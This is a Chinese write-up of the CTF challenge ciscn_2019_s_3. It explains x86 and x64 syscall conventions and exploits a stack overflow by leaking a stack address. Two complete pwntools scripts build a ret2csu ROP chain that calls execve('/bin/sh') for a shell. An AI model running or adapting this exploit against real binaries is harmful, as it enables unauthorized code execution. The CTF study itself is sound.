32位与64位 系统调用的区别:

  1. 传参方式不同

  2. 系统调用号 不同

  3. 调用方式 不同

  32位:

  传参方式:首先将系统调用号 传入 eax,然后将参数 从左到右 依次存入 ebx,ecx,edx寄存器中,返回值存在eax寄存器

  调用号:sys_read 的调用号 为 3 sys_write 的调用号 为 4

  调用方式: 使用 int 80h 中断进行系统调用

  64位:

  传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器

  调用号:sys_read 的调用号 为 0 sys_write 的调用号 为 1

  stub_execve 的调用号 为 59 stub_rt_sigreturn 的调用号 为 15

  调用方式: 使用 syscall 进行系统调用

关于程序偏移计算

  有了上面的知识,就可以做尝试的看这道题了。检查保护只开启了堆栈不可执行。

  main函数调用了vuln函数,我们来看一下vuln的汇编。

  发现首先利用系统调用,执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出。

  除了这个其实我们还可以看到程序结束的时候是直接程序开始的时候,直接是:

  pop rbp

  mov rbp,rsp

  程序结束的时候直接是:

  retn

  注意!!!这里的retn是0x400519的retn,执行这个其实就跳出这个函数了。  

  而retn是做什么的呢?retn的操作是内 pop eip,然后执行eip指向的指令。

  函数调用开始,rbp==rsp,并且值也一直没变过,所以这里覆盖rbp的时候,其实就需要将rbp覆盖成你想要的返回地址。所以这道题的偏移其实就是0x10就可以了!

pwndbg stack查看rsp上面的栈分布

  在调试这个程序的过程中,因为rsp==rbp,而pwndbg的stack指令直接看到的就是rsp下面的栈分布,这个时候应该怎么办呢?以前学过用pwndbg给地址和寄存器赋值,代码是:

  Set *addr = value  给地址赋值    Set $rsp = value  给寄存器赋值

  只要我们先让$rsp=$rsp-0x...,这样再用stack命令,就可以看到我们想要看的内存分布了!

  咳咳,开始尝试做题了!!!

做法1    通过系统调用59对应的execve,然后想办法执行execve(“/bin/sh”,0,0)

  上面说到了可以进行栈溢出,执行execve就需要给寄存器赋值,那大概的布局就是这样的:

  $rax==59

  $rdi==“/bin/sh”

  $rsi==0

  $rdx==0

  syscall

  ida中可以看到有一个函数叫做gadgets,我们看看汇编干了些什么。

  下面的箭头是给rax赋值为0x3b,也就是59,后面还跟了一个retn。做到这里,真的佩服出题人,这道题出的真好!!!这样首先解决了rax,接下来是rdi,既然“/bin/sh”是字符串,我们可不可以写入栈呢?写入栈的话,就需要leak栈地址。这里我们用上面的知识点,来调试看看栈分布!

  还记得write是会打印出0x30大小的数据,这里在打印到0x20的时候,接下来是打印出来一个地址,这个地址一看就是栈上面的,所以只要算出这个地址和binsh地址的相对偏移,就可以在程序每次执行的时候算出binsh的地址了!

  这里是ca8-b90==0x118

  我查了所有的gadgets,发现没有pop rdx,也没有其他可以给rdx赋值的指令。。。(可能是我没找到)

  这里就需要用到csu了!利用csu给寄存器赋值,调用函数!

--------------------------------我是一条可爱的分割线-----------------------------------------------------------

  上面的是我昨天写的,痛定思痛!!!今天终于全部做出来了!!!

  当我们输入之后,我在栈上其实并没有找到binsh字符串

  图片显示的是leak地址,这样我们就先leak了一个栈上的地址。接着我们尝试着去系统调用。

  这里是现在调试的python脚本:

 1 from pwn import *
2
3 p = process('./ciscn_s_3')
4 elf = ELF('./ciscn_s_3')
5 context.log_level = 'debug'
6
7
8 main_addr = elf.symbols['main']
9 csu_end = 0x040059A
10 csu_front = 0x0400580
11 ret_addr = 0x004003a9
12 rax_59_ret = 0x04004E2
13 gdb.attach(p,'b *0x00400589')
14 payload = '/bin/sh\x00' + 'A'*0x8 + p64(main_addr)
15 p.sendline(payload)
16 p.recv(0x20)
17 stack_addr = u64(p.recv(8))
18 print 'stack_addr-->' + hex(stack_addr)
19
20 payload = '/bin/sh\x00' + 'A'*0x8 + p64(rax_59_ret) + p64(csu_end)
21 payload += p64(0) + p64(1) + p64(0) + p64(0) + p64(0) + p64(0)
22 payload += p64(csu_front)
23 p.sendline(payload)
24 pause()

  

  可以看到我们现在可以在栈中看到binsh字符串了,我们算一下和我们leak的栈地址的相对偏移是多少。

  0xd868-0xd730==0x138,那么说明binsh的位置在binsh_addr = leak_addr - 0x138。

  我刚开始想在csu中直接拿shell,但是确实是忽略了一个细节。那就是csu中其实是给edi赋值,而我们这里需要rdi中存的是一个binsh的地址,很显然4个字节是满足不了的,所以我们csu的目的,就是给rsi,rdx赋值为0,任务就算是完成了。那么我们r12也就是要调用的函数应该写什么呢?这里就顺便让rax==0x3b,也就是系统调用号。

  可以看到我们也是可以在栈中找到,位置是binsh_addr + 0x10。

  接下来就是编写exp了:

 1 from pwn import *
2
3 p = process('./ciscn_s_3')
4 elf = ELF('./ciscn_s_3')
5 context.log_level = 'debug'
6
7 main_addr = elf.symbols['main']
8 csu_end = 0x040059A
9 csu_front = 0x0400580
10 ret_addr = 0x004003a9
11 rax_59_ret = 0x04004E2
12 syscall = 0x0400517
13
14 #gdb.attach(p,'b *0x00400589')
15 payload = '/bin/sh\x00' + 'A'*0x8 + p64(main_addr)
16 p.sendline(payload)
17 p.recv(0x20)
18 stack_addr = u64(p.recv(8))
19 print 'stack_addr-->' + hex(stack_addr)
20
21 binsh_addr = stack_addr - 0x138
22 rax_59 = binsh_addr + 0x10
23 pop_rdi = 0x04005a3
24
25 payload = '/bin/sh\x00' + 'A'*0x8 + p64(rax_59_ret) + p64(csu_end)
26 payload += p64(0) + p64(1) + p64(rax_59) + p64(0) + p64(0) + p64(0)
27 payload += p64(csu_front)
28 payload += 'a'*0x38
29 payload += p64(pop_rdi)
30 payload += p64(binsh_addr)
31 payload += p64(syscall)
32 p.sendline(payload)
33 p.interactive()
34 #pause()

  这道题说实话,花费了好长时间,因为用csu做的人不多,大佬们都是随便一做,用srop就解决了。也有大佬们用csu做的,但是实在是看不懂。师傅们各种骚操作,巧妙的构造rop。不过好在是我也构造出来rop了,也打通了。

  等我明天尝试学习一下srop,来用另一种方法解决这道题!!!

  

  

  

ciscn_2019_s_3 一道收获很多的题(进步大只能说明基础差)的更多相关文章

  1. 洛谷P2918 [USACO08NOV]买干草(一道完全背包模板题)

    题目链接 很明显的一道完全背包板子题,做法也很简单,就是要注意 这里你可以买比所需多的干草,只要达到数量就行了 状态转移方程:dp[j]=min(dp[j],dp[j-m[i]]+c[i]) 代码如下 ...

  2. 又一道区间DP的题 -- P3146 [USACO16OPEN]248

    https://www.luogu.org/problemnew/show/P3146 一道区间dp的题,以区间长度为阶段; 但由于要处理相邻的问题,就变得有点麻烦; 最开始想了一个我知道有漏洞的方程 ...

  3. [真题] 一道 vsftp 运维题

    一道 vsftp 运维题 一.前言 在 V 站上凑巧看到了好友发的求助帖,五天时间一个理他的都没有.哈哈哈~ 废话不多说,我们来试试. 二.题目 这里我们假设存在这样的场景: 网络内有普通用户 ade ...

  4. QDUOJ 一道简单的数据结构题 栈的使用(括号配对)

    一道简单的数据结构题 发布时间: 2017年6月3日 18:46   最后更新: 2017年6月3日 18:51   时间限制: 1000ms   内存限制: 128M 描述 如果插入“+”和“1”到 ...

  5. 大数据入门基础系列之Hadoop1.X、Hadoop2.X和Hadoop3.X的多维度区别详解(博主推荐)

    不多说,直接上干货! 在前面的博文里,我已经介绍了 大数据入门基础系列之Linux操作系统简介与选择 大数据入门基础系列之虚拟机的下载.安装详解 大数据入门基础系列之Linux的安装详解 大数据入门基 ...

  6. 贝叶斯公式由浅入深大讲解—AI基础算法入门

    1 贝叶斯方法 长久以来,人们对一件事情发生或不发生的概率,只有固定的0和1,即要么发生,要么不发生,从来不会去考虑某件事情发生的概率有多大,不发生的概率又是多大.而且概率虽然未知,但最起码是一个确定 ...

  7. 贝叶斯公式由浅入深大讲解—AI基础算法入门【转】

    本文转载自:https://www.cnblogs.com/zhoulujun/p/8893393.html 1 贝叶斯方法 长久以来,人们对一件事情发生或不发生的概率,只有固定的0和1,即要么发生, ...

  8. 大数据学习--day04(选择结构、循环结构、大数据java基础面试题)

    选择结构.循环结构.大数据java基础面试题 switch: 注意: byte short int char String(jdk1.7支持) 不能是 long float double boolea ...

  9. 从一道简单的dp题中学到的...

    今天想学点动态规划的知识,于是就看了杭电的课件,数塔问题啊,LCS啊都是比较经典的动规了,然后随便看了看就开始做课后练习题... HDOJ 1421 搬寝室 http://acm.hdu.edu.cn ...

随机推荐

  1. C#练习4

    //错误的程序using System; class Test { unsafe static void WriteLocations(byte[]arr) { fixed(byte*p_arr=ar ...

  2. [spojSUBLEX]Lexicographical Substring Search

    建立后缀自动机,对于同一个节点,出现次数是相同的(right的大小),同时满足单调性(长度越长出现次数越少),所以只需要考虑最长的串即可. PS:似乎也并不需要求依次后缀的max,不知道为什么-- 1 ...

  3. FESTUNG — 3. 采用 HDG 方法求解对流问题

    FESTUNG - 3. 采用 HDG 方法求解对流问题[1] 1. 控制方程 线性对流问题控制方程为 \[\begin{array}{ll} \partial_t c + \nabla \cdot ...

  4. Parallel NetCDF 简介

    Parallel NetCDF API 所有C接口前加ncmpi前缀,Fortran接口前加nfmpi前缀 函数返回整数 NetCDF 状态变量 1. Variable and Parameter T ...

  5. miRNA分析--比对(二)

    miRNA分析--数据过滤(一) 在比对之前为了减少比对时间,将每一个样本中的reads进行合并,得到fasta格式,其命名规则如下: 样本_r数子_x数字 r 中的数字表示reads序号: x 中的 ...

  6. mysql proxy 数据库读写分离字符集乱码

    mysql proxy 数据库读写分离字符集乱码 解决办法 在对应配置后端数据库服务器的配置.cnf中加入如下代码 init-connect='SET NAME UTF8' skip-characte ...

  7. 重新整理 .net core 实践篇——— endpoint[四十七]

    前言 简单整理一些endpoint的一些东西,主要是介绍一个这个endpoint是什么. 正文 endpoint 从表面意思是端点的意思,也就是说比如客户端的某一个action 是一个点,那么服务端的 ...

  8. C#判断是否有中文

    using System.Text.RegularExpressions; Regex reg = new Regex(@"[\u4e00-\u9fa5]"); if (reg.I ...

  9. IPFS是什么?IPFS原理、IPFS存储

    以下内容调研截止到2021/11/5日 IPFS简介 IPFS是一种内容可寻址.点对点.分布式文件系统.IPFS采用内容-地址寻址技术,即通过文件内容进行检索而不是通过文件的网络地址.简单来说,就是对 ...

  10. 日常Java 2021/9/29

    StringBuffer方法 public StringBuffer append(String s) 将指定的字符串追加到此字符序列. public StringBuffer reverse() 将 ...